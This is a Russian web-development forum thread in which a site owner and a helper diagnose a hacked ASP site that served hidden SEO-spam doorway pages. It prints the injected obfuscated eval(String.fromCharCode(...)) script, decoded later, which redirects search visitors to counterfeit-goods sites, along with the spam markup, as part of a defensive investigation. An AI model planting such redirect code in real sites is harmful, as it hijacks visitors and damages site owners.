Здравствуйте! Сегодня: Пт, 14 Дек 2018, Ваш IP: 54.82.10.219 Войти через loginza
 
Вход | Регистрация | Забыли пароль?
Мой Kbyte.Ru
> Список форумов Kbyte.Ru - - Web-программирование
+ Создать новую тему Страница: 1 · 2
Тема: Взломали сайт · +  +  дата добавления: 12.06.2015 / 11:08
Автор темы:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Добрый день.

Вчера получил письмо "счастья" от Гугл:
"Возможно, сайт http://www.***.ru/ взломан
Мы считаем, что Ваш сайт взломан.
Вероятно, хакер изменил существующие страницы или разместил на Вашем сайте контент, содержащий спам. Если хакер настроил сервер таким образом, что спам показывается только определенным посетителям, то Вы не обнаружите проблему с первого взгляда. Чтобы защитить посетителей Вашего сайта, в результатах поиска Google страницы сайта могут быть помечены как взломанные или может отображаться прежняя, безопасная версия сайта.
Примеры URL
http://www.***.ru/dallas.asp?/ts2455wy=gucci-eyeglasses-sunglasses-uk.html 11.06.15
http://www.***.ru/of.asp?/qo902su=gucci-jewellery-goldsmiths.html 11.06.15
http://www.***.ru/dallas.asp?/ed6467hj=gucci-bag-zip-64.html"

Прошел по ссылке, посмотрел, действительно происходит переадресация на чужой сайт. Причем, никаких новых файлов или директорий на сервере нет...
Просмотрел все файлы, которые могут относиться к обработке несуществующих файлов - все чисто. Просмотрел FTP - все чисто. Тех. поддержка хостинга ссылается на скрипты сайта, типа "ищите у себя"...
Тогда я скопировал САЙТ ПОЛНОСТЬЮ и разместил на другом хостинге, переписал DNS. К утру DNS обновились и указанные в письме Гугл ссылки перестали обрабатываться: "Ошибка сервера. 404 - файл или каталог не найден."

Значит проблема в сервере хостинга, я правильно понимаю?
 
Ответ # 1 # · +  +  дата добавления: 12.06.2015 / 12:58
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Вредоносный код через SQL Injection в базу может быть добавлен.

Если ссылки не работаю, то может дело в конфигурации сервера.

Нужно html-код смотреть (который в браузере выводится), есть там что-то подозрительное или нет.
 
Ответ # 2 # · +  +  дата добавления: 12.06.2015 / 17:56
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Сегодня, когда я увидел эту тему и нажал на нее, чтобы посмотреть, то неожиданно оказался на сайте AliExpress

Следствие показало, что причиной этому стала контекстная реклама Google (все следы указывают на это).
Но пока не ясно, каким образом было осуществлено перенаправление. Буду ждать, когда история повторится
 
Ответ # 3 # · +  +  дата добавления: 12.06.2015 / 18:36
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Опять этот коварный "SQL Injection"...
Не поленился, проверил базу, все чисто.
Посмотреть html код не могу, т. к. сайт сейчас работает на другом хостинге и обработка несуществующих страниц прекратилась.
Вот сейчас думаю, отправлять в Гугл запрос на повторную проверку или рано радоваться еще? :)
 
Ответ # 4 # · +  +  дата добавления: 12.06.2015 / 19:25
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Вот сейчас думаю, отправлять в Гугл запрос на повторную проверку...
Да, нужно отправлять.
 
Ответ # 5 # · +  +  дата добавления: 13.06.2015 / 00:23
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Отправил на повторную проверку.
Кстати, у Гугла нашел как он видел взломанную страницу.
В "HEAD" были добавлены строки:

<title>gucci bag zip 64|gucci eyeglasses blue Business Card/ xhefnf </title>
<meta name="keywords" content="gucci bag zip 64,gucci eyeglasses blue">
<meta name="description" content="gucci eyeglasses blue BOOKSTAND for apple ipad 2, Gray 12.06.2015 1:09:36">
<script type="text/javascript">
eval(String.fromCharCode(40,102,117,110,99,116,105,111,110,40,41,123,10,118,97,114,32,85,82,76,49,32,61,32,34,104,116,116,112,58,47,47,111,117,114,103,117,99,99,105,46,99,111,109,34,59,10,118,97,114,32,85,82,76,50,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,99,104,105,110,97,105,116,98,97,103,46,99,111,109,34,59,10,10,118,97,114,32,108,97,110,103,32,61,32,119,105,110,100,111,119,46,110,97,118,105,103,97,116,111,114,46,117,115,101,114,76,97,110,103,117,97,103,101,32,124,124,32,119,105,110,100,111,119,46,110,97,118,105,103,97,116,111,114,46,108,97,110,103,117,97,103,101,59,10,118,97,114,32,114,101,102,32,61,32,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,59,10,118,97,114,32,114,101,32,61,32,47,94,40,63,58,104,116,116,112,124,104,116,116,112,115,41,58,92,47,92,47,40,91,97,45,122,48,45,57,93,91,97,45,122,48,45,57,45,93,42,92,46,41,123,48,44,125,40,103,111,111,103,108,101,124,97,111,108,124,98,105,110,103,124,121,97,104,111,111,41,92,46,46,42,47,105,59,10,105,102,40,108,97,110,103,46,105,110,100,101,120,79,102,40,39,122,104,39,41,62,61,48,41,123,10,9,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,85,82,76,49,59,10,125,32,101,108,115,101,32,123,10,9,105,102,40,32,114,101,46,116,101,115,116,40,114,101,102,41,32,41,123,10,9,9,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,85,82,76,50,59,10,9,125,101,108,115,101,10,9,123,10,9,32,32,32,32,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,85,82,76,49,59,10,9,125,10,125,10,125,41,40,41,59));
</script>

и в тело страницы:

<h1>gucci bag zip 64  personal get Cutting the definitely inside xbox We play</h1>
<p>g Bhagwan Swaminarayan, to be the personified variety of Brahman like talked over on top of. Individuals report plenty of personal references, incidents, and even verification, as found listed below.

Acharya Shri Raghuvirjiarea water bores. Looking over the actual feelings throughout Co together with some other place, this Alberta Electricity plus Computer programs Payment advertised xbox do not ended up one of gas and oil prices recreation ble coverage, service plan, and adaptability to decide on when and how consumers wish to connect with for me.So i am incredibly that they are a us Relatives solution. My very own exercising suffers from own all set everybo was over and done with the help.

Furthermore, we are certain to get governmental inside the political environment the following using beyond activities, nevertheless must just simply claim these questions toned mode, to geunty, Calif., regional through pals immediately after obtaining fresh about hearing aids. He always aspired to definitely take note of Mozart, therefore this man's family dress yourself in "Lacrimosa," any brooding do the wo.3 re diesel-powered powerplant, driving a motor vehicle leading coasters using a twisting ripper tools half dozen speed mechanical gearbox as well as a&nbsp;<a href='?/nm9958qs=how-do-you-know-if-a-gucci-wallet-is-real.html'  title='how do you know if a gucci wallet is real'>how do you know if a gucci wallet is real</a> guide half-dozen speeder. There's the more option of Citroen's elecreally sunlit heavens of any Southernmost Hemisphere summer months. (AP Photo/Rod McGuirk)

Inside this Weekend, Jan. 25, 2013 pics, your taking in the sights copter places close up Cutting edge Zealand's Scott Bottom part wShilpa Agnihotri, who has been evicted your time to come back. We were holding at the outset put into diverse sections of your home still used to be after u . s ..

Even with various volatile incidents erupting recently arou school&nbsp;<strong>gucci eyeglasses blue</strong> yard for the stop jam-packed with shrubs not to mention grassy, hens and also squirrels, all the image and then noise of babies at play may hold on g<h2>gucci bag zip 64  Bottom well part set twisting leading</h2> crictally ill affected person, or alternatively by using an ma&nbsp;<a href='?/nm9958qs=discount-on-gucci-handbags.html'  title='discount on gucci handbags'>discount on gucci handbags</a></p>
<ul>
<li><a href='?/nm9958qs=gucci-spring-2012-bags.html'  title='gucci spring 2012 bags'>gucci spring 2012 bags</a></li><li><a href='?/nm9958qs=tony-guccione.html'  title='tony guccione'>tony guccione</a></li><li><a href='?/nm9958qs=buy-cheap-authentic-gucci-bags.html'  title='buy cheap authentic gucci bags'>buy cheap authentic gucci bags</a></li><li><a href='?/nm9958qs=overstock-gucci-guilty.html'  title='overstock gucci guilty'>overstock gucci guilty</a></li><li><a href='?/nm9958qs=gucci-fanny-pack-neiman-marcus.html'  title='gucci fanny pack neiman marcus'>gucci fanny pack neiman marcus</a></li>
</ul>


Остальное, вроде бы, все моё.
 
Ответ # 6 # · +  +  дата добавления: 13.06.2015 / 01:09
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Title и meta полностью заменены или оригинальные остались? А содержимое вставлено в начало body или в конец?

Если подмена аккуратная и файлы не изменялись, то проблема вполне может быть на уровне сервера (хостинга).

На уровне сайта, это может быть в Global.asa(x), либо в http-обработчиках. Но для этого нужен доступ, как минимум, к FTP. Файлы проще всего по дате изменения проверить. Если ASP.NET, то в папке bin может быть сборка (dll), которая может обрабатывать такие адреса. Это видимо doorway.

Файлы of.asp и т.п. - настоящие, или таких нет на сервере?
 
Ответ # 7 # · +  +  дата добавления: 13.06.2015 / 02:02
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Какие-то meta остались мои, заменены title, keywords и description.
В body содержимое вставлено в конец основного контента страницы, перед "подвалом".
Сайт древний, файл Global.asax пустой :)
Папки "bin" никогда не было и нет... :)
Файла "of.asp", как и всех остальных, которых нашел Гугл, на сервере не было и нет. Надеюсь, и не будет. )

PS
Сейчас заметил, что среди моих meta остался и мета-тег "yandex-verification", который присутствует только на главной.
Содержимое страницы сильно урезано, оставлены только "шапка", верхушка левой таблицы и низ правой, потом идет "вражеское" содержимое и мой "подвал".
 
Ответ # 8 # · +  +  дата добавления: 13.06.2015 / 11:44
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Если на предыдущем хостинге (где обнаружилась проблема) есть какой-то домен, то можно:
1. Проверить, что вражеские страницы работают.
2. Удалить все свои файлы (при условии, что есть копия) и проверить еще раз.

Если все работает, то внедрение осуществлено на уровне сервера хостера и скорее всего у кого-то случится инфаркт

Можно проверить других клиентов хостера, если известны адреса сайтов. Хотя, если хостер большой и у него много серверов, то не факт, что его полностью взломали, может только один сервер.

Вариант с внедрением на уровне пути следования трафика тоже нельзя исключать. Тогда хостер может быть и не причем. Но это слишком катастрофическая уязвимость
 
Ответ # 9 # · +  +  дата добавления: 13.06.2015 / 14:01
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Да, на старом хостинге еще есть проекты. Если в ссылку "http://www.***.ru/dallas.asp?/ts2455wy=gucci-eyeglasses-sunglasses-uk.html" подставить имя домена ныне работающего на старом хостинге, выскакивает ошибка: "Server Error. 404 - File or directory not found." Может быть вирус заточен под определенный домен?

На старом хостинге были и другие сайты, также находящиеся в панели Гугла, но взлом Гуглом был замечен только на одном... Возможно, пока только на одном?
 
Ответ # 10 # · +  +  дата добавления: 13.06.2015 / 14:47
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


В JavaScript зашит такой код:
(function(){ 
var URL1 = "http://ou***cci.com"; 
var URL2 = "http://www.chi****bag.com"; 
var lang = window.navigator.userLanguage || window.navigator.language; 
var ref = document.referrer; 
var re = /^(?:http|https):\/\/([a-z0-9][a-z0-9-]*\.){0,}(google|aol|bing|yahoo)\..*/i; 
if(lang.indexOf('zh')>=0){ 
  window.location = URL1; 
} else { 
  if( re.test(ref) ){ 
    window.location = URL2; 
  }else { 
    window.location = URL1; 
  } 
} })();

Google нашел сайт t****p.ru, на котором есть такие страницы, и судя по копирайту... Домен хороший.

Адрес страницы:
******.ru/archaeology.asp?/ay4837df=cheap-mens-gucci-wallets-5s.html
работает. Осуществляется перенаправление.

Перенаправление делается JavaScript, если отключить JavaScript, то редиректа не будет.

Попробовал открыть страницу archaeology.asp, открывается нормально.
Попробовал указать другие имена, сервер выдает ошибку 404. Следовательно страница должна существовать, либо должен быть обработчик адреса /archaeology.asp.
 
Ответ # 11 # · +  +  дата добавления: 13.06.2015 / 15:11
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


По сайту:
введите защитный код (copy-paste): * 5t6o13s144959
Плохая защита, робот может легко скопировать код.

Нужна либо Captcha, либо использовать JavaScript.
/user_forum.aspx
При отправке сообщения выдает ошибку, что страница не найдена.

Пробовал без регистрации.

А что стало с сайтом? Посмотрел архив, весной 2015 года он выглядел лучше, а сейчас какой-то лысый.

По внедрению: явно была сделана копия исходной страницы сайта. Все сделано относительно аккуратно, может даже человеком. А вот как, пока непонятно (если файлы действительно не были изменены).
 
Ответ # 12 # · +  +  дата добавления: 13.06.2015 / 15:20
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Можно попробовать сделать поиск по тексту по всем файлам проекта, в Visual Studio.

1. Открыть проект;
2. Меню Правка -> Поиск и замена -> Найти в файлах;
3. В строку поиска указа фрагмент из текста внедренной страницы, например: gucci;
4. Выбрать Все решение;
5. Найти все.



Внизу, в панели, появятся результаты поиска.
 
Ответ # 13 # · +  +  дата добавления: 13.06.2015 / 17:58
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Адрес страницы:
******.ru/archaeology.asp?/ay4837df=cheap-mens-gucci-wallets-5s.html
работает. Осуществляется перенаправление.

да-а-а... ппц.

Страницы archaeology.asp на сайте нет, как и других чужих. На сайте вообще нет ни одной страницы .asp. Все файлы чистые (скачал и проверил Дримвивером), в поддиректориях чужих файлов нет. База чистая.
 
Ответ # 14 # · +  +  дата добавления: 13.06.2015 / 18:05
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Видно, что за образец взята страница со старого сайта, значит где-то должен быть файл с этими содержимым.

Может он скрытый?

В default.aspx можно добавит код, который попробует дернуть этот файл, типа:
If System.IO.File.Exists(Server.MapPath("~/archaeology.asp")) Then
  Response.Write("Файл archaeology.asp обнаружен!!!")
Else
  Response.Write("Файл archaeology.asp не найден...")
End If
 
Ответ # 15 # · +  +  дата добавления: 13.06.2015 / 18:20
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Файл archaeology.asp обнаружен!!!
 
Ответ # 16 # · +  +  дата добавления: 13.06.2015 / 18:36
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Значит он скрытый.

В FileZilla включить отображение скрытых файлов можно через меню Сервер -> Принудительно отображать скрытые файлы.



По FileZilla, если его нет, то лучше найти установщик родной.
Вот тут вроде нормальные http://filezilla.ru/get/

Если у хостера в админке есть панель, где выводятся файлы, то там скрытые файлы по идее должны быть видны.

Что касается причины появления таких файлов, то их как минимум две:
1. Скомпрометированы учетные данные доступа к FTP.
2. Пользователям сайта разрешена загрузка файлов на сервер и не проводится проверка типов загружаемых файлов (т.е. кто-то просто залил файл .asp на сервер, через веб-интерфейс).
 
Ответ # 17 # · +  +  дата добавления: 13.06.2015 / 18:37
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Локально провериться на вирусы не помешает. Вирус может отслеживать работу с FTP и незаметно добавлять свои файлы.
 
Ответ # 18 # · +  +  дата добавления: 13.06.2015 / 18:55
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Спасибо.
Поставил FileZilla, включил скрытые файлы. Файлы есть, в корне две штуки.
Загрузку файлов перепроверю.
Вопросы:
1. Как можно вот эту строчку попросить показать все файлы с расширением .asp?
DGTreeView.DataSource = DI.GetFiles("*asp*")
2. Можно ли запретить через web.config исполнение фалов .asp?
Где-то у меня была вот такая:
<add path="*.asp" verb="*" type="System.Web.HttpForbiddenHandler" validate="false" />
Кстати, хостинг в вебинтерфейсе скрытых файлов не показывает...
 
Ответ # 19 # · +  +  дата добавления: 13.06.2015 / 19:00
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


1. DGTreeView.DataSource = DI.GetFiles("*.asp").

2. Можно, но проблему это не решит. Лучше попытаться найти источник проблемы. Поменять пароли, проверить себя на вирусы, убедиться, что через веб нельзя залить файлы с расширением .asp, .aspx, .php и т.п.
 
Ответ # 20 # · +  +  дата добавления: 13.06.2015 / 19:06
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Я вот думаю, самая вероятная причина - это все же утечка пароля к FTP (или вирус). Поскольку файл скрытый и через веб так сделать не получится, разве что в два этапа, но слишком много мороки.
 
Страница: 1 · 2 + Создать новую тему